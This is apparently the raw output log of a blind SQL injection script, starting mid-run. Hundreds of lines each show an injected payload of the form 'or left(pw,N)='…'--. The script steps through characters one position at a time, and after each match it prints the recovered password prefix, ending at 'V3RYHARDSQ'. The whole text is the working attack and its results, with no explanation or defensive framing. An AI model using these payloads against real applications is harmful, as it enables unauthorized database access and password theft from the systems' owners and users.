column : 3
query : 'or left(pw,3)='V3 '--
query : 'or left(pw,3)='V3!'--
query : 'or left(pw,3)='V3"'--
query : 'or left(pw,3)='V3#'--
query : 'or left(pw,3)='V3$'--
query : 'or left(pw,3)='V3%'--
query : 'or left(pw,3)='V3&'--
query : 'or left(pw,3)='V3''--
query : 'or left(pw,3)='V3('--
query : 'or left(pw,3)='V3)'--
query : 'or left(pw,3)='V3*'--
query : 'or left(pw,3)='V3+'--
query : 'or left(pw,3)='V3,'--
query : 'or left(pw,3)='V3-'--
query : 'or left(pw,3)='V3.'--
query : 'or left(pw,3)='V3/'--
query : 'or left(pw,3)='V30'--
query : 'or left(pw,3)='V31'--
query : 'or left(pw,3)='V32'--
query : 'or left(pw,3)='V33'--
query : 'or left(pw,3)='V34'--
query : 'or left(pw,3)='V35'--
query : 'or left(pw,3)='V36'--
query : 'or left(pw,3)='V37'--
query : 'or left(pw,3)='V38'--
query : 'or left(pw,3)='V39'--
query : 'or left(pw,3)='V3:'--
query : 'or left(pw,3)='V3;'--
query : 'or left(pw,3)='V3<'--
query : 'or left(pw,3)='V3='--
query : 'or left(pw,3)='V3>'--
query : 'or left(pw,3)='V3?'--
query : 'or left(pw,3)='V3@'--
query : 'or left(pw,3)='V3A'--
query : 'or left(pw,3)='V3B'--
query : 'or left(pw,3)='V3C'--
query : 'or left(pw,3)='V3D'--
query : 'or left(pw,3)='V3E'--
query : 'or left(pw,3)='V3F'--
query : 'or left(pw,3)='V3G'--
query : 'or left(pw,3)='V3H'--
query : 'or left(pw,3)='V3I'--
query : 'or left(pw,3)='V3J'--
query : 'or left(pw,3)='V3K'--
query : 'or left(pw,3)='V3L'--
query : 'or left(pw,3)='V3M'--
query : 'or left(pw,3)='V3N'--
query : 'or left(pw,3)='V3O'--
query : 'or left(pw,3)='V3P'--
query : 'or left(pw,3)='V3Q'--
query : 'or left(pw,3)='V3R'--
password : V3R
column : 4
query : 'or left(pw,4)='V3R '--
query : 'or left(pw,4)='V3R!'--
query : 'or left(pw,4)='V3R"'--
query : 'or left(pw,4)='V3R#'--
query : 'or left(pw,4)='V3R$'--
query : 'or left(pw,4)='V3R%'--
query : 'or left(pw,4)='V3R&'--
query : 'or left(pw,4)='V3R''--
query : 'or left(pw,4)='V3R('--
query : 'or left(pw,4)='V3R)'--
query : 'or left(pw,4)='V3R*'--
query : 'or left(pw,4)='V3R+'--
query : 'or left(pw,4)='V3R,'--
query : 'or left(pw,4)='V3R-'--
query : 'or left(pw,4)='V3R.'--
query : 'or left(pw,4)='V3R/'--
query : 'or left(pw,4)='V3R0'--
query : 'or left(pw,4)='V3R1'--
query : 'or left(pw,4)='V3R2'--
query : 'or left(pw,4)='V3R3'--
query : 'or left(pw,4)='V3R4'--
query : 'or left(pw,4)='V3R5'--
query : 'or left(pw,4)='V3R6'--
query : 'or left(pw,4)='V3R7'--
query : 'or left(pw,4)='V3R8'--
query : 'or left(pw,4)='V3R9'--
query : 'or left(pw,4)='V3R:'--
query : 'or left(pw,4)='V3R;'--
query : 'or left(pw,4)='V3R<'--
query : 'or left(pw,4)='V3R='--
query : 'or left(pw,4)='V3R>'--
query : 'or left(pw,4)='V3R?'--
query : 'or left(pw,4)='V3R@'--
query : 'or left(pw,4)='V3RA'--
query : 'or left(pw,4)='V3RB'--
query : 'or left(pw,4)='V3RC'--
query : 'or left(pw,4)='V3RD'--
query : 'or left(pw,4)='V3RE'--
query : 'or left(pw,4)='V3RF'--
query : 'or left(pw,4)='V3RG'--
query : 'or left(pw,4)='V3RH'--
query : 'or left(pw,4)='V3RI'--
query : 'or left(pw,4)='V3RJ'--
query : 'or left(pw,4)='V3RK'--
query : 'or left(pw,4)='V3RL'--
query : 'or left(pw,4)='V3RM'--
query : 'or left(pw,4)='V3RN'--
query : 'or left(pw,4)='V3RO'--
query : 'or left(pw,4)='V3RP'--
query : 'or left(pw,4)='V3RQ'--
query : 'or left(pw,4)='V3RR'--
query : 'or left(pw,4)='V3RS'--
query : 'or left(pw,4)='V3RT'--
query : 'or left(pw,4)='V3RU'--
query : 'or left(pw,4)='V3RV'--
query : 'or left(pw,4)='V3RW'--
query : 'or left(pw,4)='V3RX'--
query : 'or left(pw,4)='V3RY'--
password : V3RY
column : 5
query : 'or left(pw,5)='V3RY '--
query : 'or left(pw,5)='V3RY!'--
query : 'or left(pw,5)='V3RY"'--
query : 'or left(pw,5)='V3RY#'--
query : 'or left(pw,5)='V3RY$'--
query : 'or left(pw,5)='V3RY%'--
query : 'or left(pw,5)='V3RY&'--
query : 'or left(pw,5)='V3RY''--
query : 'or left(pw,5)='V3RY('--
query : 'or left(pw,5)='V3RY)'--
query : 'or left(pw,5)='V3RY*'--
query : 'or left(pw,5)='V3RY+'--
query : 'or left(pw,5)='V3RY,'--
query : 'or left(pw,5)='V3RY-'--
query : 'or left(pw,5)='V3RY.'--
query : 'or left(pw,5)='V3RY/'--
query : 'or left(pw,5)='V3RY0'--
query : 'or left(pw,5)='V3RY1'--
query : 'or left(pw,5)='V3RY2'--
query : 'or left(pw,5)='V3RY3'--
query : 'or left(pw,5)='V3RY4'--
query : 'or left(pw,5)='V3RY5'--
query : 'or left(pw,5)='V3RY6'--
query : 'or left(pw,5)='V3RY7'--
query : 'or left(pw,5)='V3RY8'--
query : 'or left(pw,5)='V3RY9'--
query : 'or left(pw,5)='V3RY:'--
query : 'or left(pw,5)='V3RY;'--
query : 'or left(pw,5)='V3RY<'--
query : 'or left(pw,5)='V3RY='--
query : 'or left(pw,5)='V3RY>'--
query : 'or left(pw,5)='V3RY?'--
query : 'or left(pw,5)='V3RY@'--
query : 'or left(pw,5)='V3RYA'--
query : 'or left(pw,5)='V3RYB'--
query : 'or left(pw,5)='V3RYC'--
query : 'or left(pw,5)='V3RYD'--
query : 'or left(pw,5)='V3RYE'--
query : 'or left(pw,5)='V3RYF'--
query : 'or left(pw,5)='V3RYG'--
query : 'or left(pw,5)='V3RYH'--
password : V3RYH
column : 6
query : 'or left(pw,6)='V3RYH '--
query : 'or left(pw,6)='V3RYH!'--
query : 'or left(pw,6)='V3RYH"'--
query : 'or left(pw,6)='V3RYH#'--
query : 'or left(pw,6)='V3RYH$'--
query : 'or left(pw,6)='V3RYH%'--
query : 'or left(pw,6)='V3RYH&'--
query : 'or left(pw,6)='V3RYH''--
query : 'or left(pw,6)='V3RYH('--
query : 'or left(pw,6)='V3RYH)'--
query : 'or left(pw,6)='V3RYH*'--
query : 'or left(pw,6)='V3RYH+'--
query : 'or left(pw,6)='V3RYH,'--
query : 'or left(pw,6)='V3RYH-'--
query : 'or left(pw,6)='V3RYH.'--
query : 'or left(pw,6)='V3RYH/'--
query : 'or left(pw,6)='V3RYH0'--
query : 'or left(pw,6)='V3RYH1'--
query : 'or left(pw,6)='V3RYH2'--
query : 'or left(pw,6)='V3RYH3'--
query : 'or left(pw,6)='V3RYH4'--
query : 'or left(pw,6)='V3RYH5'--
query : 'or left(pw,6)='V3RYH6'--
query : 'or left(pw,6)='V3RYH7'--
query : 'or left(pw,6)='V3RYH8'--
query : 'or left(pw,6)='V3RYH9'--
query : 'or left(pw,6)='V3RYH:'--
query : 'or left(pw,6)='V3RYH;'--
query : 'or left(pw,6)='V3RYH<'--
query : 'or left(pw,6)='V3RYH='--
query : 'or left(pw,6)='V3RYH>'--
query : 'or left(pw,6)='V3RYH?'--
query : 'or left(pw,6)='V3RYH@'--
query : 'or left(pw,6)='V3RYHA'--
password : V3RYHA
column : 7
query : 'or left(pw,7)='V3RYHA '--
query : 'or left(pw,7)='V3RYHA!'--
query : 'or left(pw,7)='V3RYHA"'--
query : 'or left(pw,7)='V3RYHA#'--
query : 'or left(pw,7)='V3RYHA$'--
query : 'or left(pw,7)='V3RYHA%'--
query : 'or left(pw,7)='V3RYHA&'--
query : 'or left(pw,7)='V3RYHA''--
query : 'or left(pw,7)='V3RYHA('--
query : 'or left(pw,7)='V3RYHA)'--
query : 'or left(pw,7)='V3RYHA*'--
query : 'or left(pw,7)='V3RYHA+'--
query : 'or left(pw,7)='V3RYHA,'--
query : 'or left(pw,7)='V3RYHA-'--
query : 'or left(pw,7)='V3RYHA.'--
query : 'or left(pw,7)='V3RYHA/'--
query : 'or left(pw,7)='V3RYHA0'--
query : 'or left(pw,7)='V3RYHA1'--
query : 'or left(pw,7)='V3RYHA2'--
query : 'or left(pw,7)='V3RYHA3'--
query : 'or left(pw,7)='V3RYHA4'--
query : 'or left(pw,7)='V3RYHA5'--
query : 'or left(pw,7)='V3RYHA6'--
query : 'or left(pw,7)='V3RYHA7'--
query : 'or left(pw,7)='V3RYHA8'--
query : 'or left(pw,7)='V3RYHA9'--
query : 'or left(pw,7)='V3RYHA:'--
query : 'or left(pw,7)='V3RYHA;'--
query : 'or left(pw,7)='V3RYHA<'--
query : 'or left(pw,7)='V3RYHA='--
query : 'or left(pw,7)='V3RYHA>'--
query : 'or left(pw,7)='V3RYHA?'--
query : 'or left(pw,7)='V3RYHA@'--
query : 'or left(pw,7)='V3RYHAA'--
query : 'or left(pw,7)='V3RYHAB'--
query : 'or left(pw,7)='V3RYHAC'--
query : 'or left(pw,7)='V3RYHAD'--
query : 'or left(pw,7)='V3RYHAE'--
query : 'or left(pw,7)='V3RYHAF'--
query : 'or left(pw,7)='V3RYHAG'--
query : 'or left(pw,7)='V3RYHAH'--
query : 'or left(pw,7)='V3RYHAI'--
query : 'or left(pw,7)='V3RYHAJ'--
query : 'or left(pw,7)='V3RYHAK'--
query : 'or left(pw,7)='V3RYHAL'--
query : 'or left(pw,7)='V3RYHAM'--
query : 'or left(pw,7)='V3RYHAN'--
query : 'or left(pw,7)='V3RYHAO'--
query : 'or left(pw,7)='V3RYHAP'--
query : 'or left(pw,7)='V3RYHAQ'--
query : 'or left(pw,7)='V3RYHAR'--
password : V3RYHAR
column : 8
query : 'or left(pw,8)='V3RYHAR '--
query : 'or left(pw,8)='V3RYHAR!'--
query : 'or left(pw,8)='V3RYHAR"'--
query : 'or left(pw,8)='V3RYHAR#'--
query : 'or left(pw,8)='V3RYHAR$'--
query : 'or left(pw,8)='V3RYHAR%'--
query : 'or left(pw,8)='V3RYHAR&'--
query : 'or left(pw,8)='V3RYHAR''--
query : 'or left(pw,8)='V3RYHAR('--
query : 'or left(pw,8)='V3RYHAR)'--
query : 'or left(pw,8)='V3RYHAR*'--
query : 'or left(pw,8)='V3RYHAR+'--
query : 'or left(pw,8)='V3RYHAR,'--
query : 'or left(pw,8)='V3RYHAR-'--
query : 'or left(pw,8)='V3RYHAR.'--
query : 'or left(pw,8)='V3RYHAR/'--
query : 'or left(pw,8)='V3RYHAR0'--
query : 'or left(pw,8)='V3RYHAR1'--
query : 'or left(pw,8)='V3RYHAR2'--
query : 'or left(pw,8)='V3RYHAR3'--
query : 'or left(pw,8)='V3RYHAR4'--
query : 'or left(pw,8)='V3RYHAR5'--
query : 'or left(pw,8)='V3RYHAR6'--
query : 'or left(pw,8)='V3RYHAR7'--
query : 'or left(pw,8)='V3RYHAR8'--
query : 'or left(pw,8)='V3RYHAR9'--
query : 'or left(pw,8)='V3RYHAR:'--
query : 'or left(pw,8)='V3RYHAR;'--
query : 'or left(pw,8)='V3RYHAR<'--
query : 'or left(pw,8)='V3RYHAR='--
query : 'or left(pw,8)='V3RYHAR>'--
query : 'or left(pw,8)='V3RYHAR?'--
query : 'or left(pw,8)='V3RYHAR@'--
query : 'or left(pw,8)='V3RYHARA'--
query : 'or left(pw,8)='V3RYHARB'--
query : 'or left(pw,8)='V3RYHARC'--
query : 'or left(pw,8)='V3RYHARD'--
password : V3RYHARD
column : 9
query : 'or left(pw,9)='V3RYHARD '--
query : 'or left(pw,9)='V3RYHARD!'--
query : 'or left(pw,9)='V3RYHARD"'--
query : 'or left(pw,9)='V3RYHARD#'--
query : 'or left(pw,9)='V3RYHARD$'--
query : 'or left(pw,9)='V3RYHARD%'--
query : 'or left(pw,9)='V3RYHARD&'--
query : 'or left(pw,9)='V3RYHARD''--
query : 'or left(pw,9)='V3RYHARD('--
query : 'or left(pw,9)='V3RYHARD)'--
query : 'or left(pw,9)='V3RYHARD*'--
query : 'or left(pw,9)='V3RYHARD+'--
query : 'or left(pw,9)='V3RYHARD,'--
query : 'or left(pw,9)='V3RYHARD-'--
query : 'or left(pw,9)='V3RYHARD.'--
query : 'or left(pw,9)='V3RYHARD/'--
query : 'or left(pw,9)='V3RYHARD0'--
query : 'or left(pw,9)='V3RYHARD1'--
query : 'or left(pw,9)='V3RYHARD2'--
query : 'or left(pw,9)='V3RYHARD3'--
query : 'or left(pw,9)='V3RYHARD4'--
query : 'or left(pw,9)='V3RYHARD5'--
query : 'or left(pw,9)='V3RYHARD6'--
query : 'or left(pw,9)='V3RYHARD7'--
query : 'or left(pw,9)='V3RYHARD8'--
query : 'or left(pw,9)='V3RYHARD9'--
query : 'or left(pw,9)='V3RYHARD:'--
query : 'or left(pw,9)='V3RYHARD;'--
query : 'or left(pw,9)='V3RYHARD<'--
query : 'or left(pw,9)='V3RYHARD='--
query : 'or left(pw,9)='V3RYHARD>'--
query : 'or left(pw,9)='V3RYHARD?'--
query : 'or left(pw,9)='V3RYHARD@'--
query : 'or left(pw,9)='V3RYHARDA'--
query : 'or left(pw,9)='V3RYHARDB'--
query : 'or left(pw,9)='V3RYHARDC'--
query : 'or left(pw,9)='V3RYHARDD'--
query : 'or left(pw,9)='V3RYHARDE'--
query : 'or left(pw,9)='V3RYHARDF'--
query : 'or left(pw,9)='V3RYHARDG'--
query : 'or left(pw,9)='V3RYHARDH'--
query : 'or left(pw,9)='V3RYHARDI'--
query : 'or left(pw,9)='V3RYHARDJ'--
query : 'or left(pw,9)='V3RYHARDK'--
query : 'or left(pw,9)='V3RYHARDL'--
query : 'or left(pw,9)='V3RYHARDM'--
query : 'or left(pw,9)='V3RYHARDN'--
query : 'or left(pw,9)='V3RYHARDO'--
query : 'or left(pw,9)='V3RYHARDP'--
query : 'or left(pw,9)='V3RYHARDQ'--
query : 'or left(pw,9)='V3RYHARDR'--
query : 'or left(pw,9)='V3RYHARDS'--
password : V3RYHARDS
column : 10
query : 'or left(pw,10)='V3RYHARDS '--
query : 'or left(pw,10)='V3RYHARDS!'--
query : 'or left(pw,10)='V3RYHARDS"'--
query : 'or left(pw,10)='V3RYHARDS#'--
query : 'or left(pw,10)='V3RYHARDS$'--
query : 'or left(pw,10)='V3RYHARDS%'--
query : 'or left(pw,10)='V3RYHARDS&'--
query : 'or left(pw,10)='V3RYHARDS''--
query : 'or left(pw,10)='V3RYHARDS('--
query : 'or left(pw,10)='V3RYHARDS)'--
query : 'or left(pw,10)='V3RYHARDS*'--
query : 'or left(pw,10)='V3RYHARDS+'--
query : 'or left(pw,10)='V3RYHARDS,'--
query : 'or left(pw,10)='V3RYHARDS-'--
query : 'or left(pw,10)='V3RYHARDS.'--
query : 'or left(pw,10)='V3RYHARDS/'--
query : 'or left(pw,10)='V3RYHARDS0'--
query : 'or left(pw,10)='V3RYHARDS1'--
query : 'or left(pw,10)='V3RYHARDS2'--
query : 'or left(pw,10)='V3RYHARDS3'--
query : 'or left(pw,10)='V3RYHARDS4'--
query : 'or left(pw,10)='V3RYHARDS5'--
query : 'or left(pw,10)='V3RYHARDS6'--
query : 'or left(pw,10)='V3RYHARDS7'--
query : 'or left(pw,10)='V3RYHARDS8'--
query : 'or left(pw,10)='V3RYHARDS9'--
query : 'or left(pw,10)='V3RYHARDS:'--
query : 'or left(pw,10)='V3RYHARDS;'--
query : 'or left(pw,10)='V3RYHARDS<'--
query : 'or left(pw,10)='V3RYHARDS='--
query : 'or left(pw,10)='V3RYHARDS>'--
query : 'or left(pw,10)='V3RYHARDS?'--
query : 'or left(pw,10)='V3RYHARDS@'--
query : 'or left(pw,10)='V3RYHARDSA'--
query : 'or left(pw,10)='V3RYHARDSB'--
query : 'or left(pw,10)='V3RYHARDSC'--
query : 'or left(pw,10)='V3RYHARDSD'--
query : 'or left(pw,10)='V3RYHARDSE'--
query : 'or left(pw,10)='V3RYHARDSF'--
query : 'or left(pw,10)='V3RYHARDSG'--
query : 'or left(pw,10)='V3RYHARDSH'--
query : 'or left(pw,10)='V3RYHARDSI'--
query : 'or left(pw,10)='V3RYHARDSJ'--
query : 'or left(pw,10)='V3RYHARDSK'--
query : 'or left(pw,10)='V3RYHARDSL'--
query : 'or left(pw,10)='V3RYHARDSM'--
query : 'or left(pw,10)='V3RYHARDSN'--
query : 'or left(pw,10)='V3RYHARDSO'--
query : 'or left(pw,10)='V3RYHARDSP'--
query : 'or left(pw,10)='V3RYHARDSQ'--
password : V3RYHARDSQ
